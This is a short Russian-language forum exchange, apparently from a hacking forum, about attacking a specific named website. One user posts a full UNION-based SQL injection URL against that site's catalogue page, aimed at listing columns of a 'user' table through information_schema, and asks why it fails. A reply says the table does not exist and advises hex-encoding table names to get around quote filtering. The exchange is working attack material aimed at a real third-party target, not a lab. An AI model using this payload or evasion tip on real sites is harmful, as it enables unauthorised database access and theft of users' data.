Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,1 2,13,14,15,16,17+from+information_schema.columns+w here+table_name=%27user%27+--
не катит?)
нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
__________________ Feci, quod potui. Faciant meliora potentes.